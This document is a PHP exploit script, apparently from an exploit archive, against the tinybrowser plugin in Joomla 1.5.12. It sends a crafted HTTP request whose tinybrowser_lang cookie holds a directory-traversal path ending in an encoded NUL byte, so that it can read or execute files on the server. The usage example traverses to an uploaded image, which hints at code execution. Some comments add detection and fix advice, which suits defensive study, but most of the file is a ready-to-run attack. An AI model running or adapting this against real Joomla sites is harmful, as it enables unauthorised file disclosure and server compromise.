Joomla 1.5.12 read/exec remote files :

Date : 2010-01-26 Author : Nikola Petrov
<?php
	/*
		Copyright (c) ITIX LTD

		This program is free software: you can redistribute it and/or modify
		it under the terms of the GNU General Public License as published by
		the Free Software Foundation, either version 3 of the License, or
		(at your option) any later version.

		This program is distributed in the hope that it will be useful,
		but WITHOUT ANY WARRANTY; without even the implied warranty of
		MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
		GNU General Public License for more details.

		You should have received a copy of the GNU General Public License
		along with this program.  If not, see <http://www.gnu.org/licenses/>.

		TITLE:		Joomla 1.5.12 read/exec remote files
		AUTHOR:		Nikola Petrov ([email protected])
		VERSION:	1.0
		LICENSE:	GNU General Public License

		Platform: Joomla 1.5.12
		Vulnerabilities discovery and implementation: Nikola Petrov ([email protected])
		Date: 27.08.2009
	*/
	
	// Banner: credits and discovery date, written to stdout on every run.
	echo "

#########################################################################
";
	echo "# LFI discovery and implementation: Nikola Petrov ([email protected])
";
	echo "# Date: 27.08.2009
";
	echo "#########################################################################

";

	// host, path and file are mandatory; port and debug are optional.
	if(!($argc >= 4)) {
		$Self = $argv[0];
		print "usage: php ". $Self ." host path file [port] [debug]
";
		print "example: php ". $Self ." localhost /j1512 ../../../../../../../../wamp/www/j1512/images/stories/duck.jpg 80 1
";
		exit();
	}

	$Host = $argv[1];

	// Fixed location of tinybrowser's folders.php below the Joomla base path.
	// Defender note: requests for this script from clients that hold no editor
	// session are visible in the web server access log and worth alerting on.
	$Path = $argv[2] . '/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/folders.php';

	// A URL-encoded NUL is appended to the file argument.
	// NOTE(review): presumably folders.php adds its own suffix to the cookie value
	// before using it as a file path and the NUL cuts that suffix off; the server
	// code is not shown here. PHP 5.3.4 and later refuse file paths that contain
	// a NUL byte, which blocks this kind of truncation.
	$File = $argv[3] . '%00';

	// Optional arguments: the port falls back to 80, and any non-empty fifth
	// argument switches debug output on.
	$Port = empty($argv[4]) ? 80 : $argv[4];
	$Debug = empty($argv[5]) ? 0 : 1;

	/**
	 * Sends a raw, pre-built request over a plain TCP socket and returns
	 * everything the peer writes back until it closes the connection.
	 *
	 * No TLS and no explicit timeout are used: fsockopen() is called with host
	 * and port only. The response is returned unparsed (status line, headers
	 * and body together). If the connection cannot be opened, an error line is
	 * printed and the script terminates.
	 *
	 * @param string     $aHost   Host name or address to connect to.
	 * @param int|string $aPort   TCP port.
	 * @param string     $aPacket Complete request text, written as-is.
	 * @return string Raw bytes read from the socket.
	 */
	function HttpSend($aHost, $aPort, $aPacket) {
		$Conn = fsockopen($aHost, $aPort);
		if(!$Conn) {
			print "Error connecting to $aHost:$aPort

";
			exit();
		}

		fputs($Conn, $aPacket);

		// Read in 1 KiB chunks until the peer signals end of stream.
		$Received = "";
		while(!feof($Conn)) {
			$Received .= fread($Conn, 1024);
		}

		fclose($Conn);

		return $Received;
	}
	
	// HTTP/1.0 GET for folders.php. The file value travels in the
	// tinybrowser_lang cookie, not in the URL, so a default access log will not
	// record it. Detection therefore needs a rule that inspects the Cookie
	// header and flags traversal sequences ('../') or an encoded NUL ('%00') in
	// this cookie. On the server side, the value should be matched against a
	// fixed allow-list of language names before it is used in any file path.
	$Packet = "GET {$Path} HTTP/1.0
Host: {$Host}
Cookie: tinybrowser_lang={$File}
Connection: close

";

	// Debug mode echoes the exact request before it is sent.
	if($Debug) {
		print "Request to '$Host:$Port':
" . $Packet;
	}

	// The raw response (headers and body) goes to stdout unmodified.
	$Reply = HttpSend($Host, $Port, $Packet);
	print $Reply;
?>
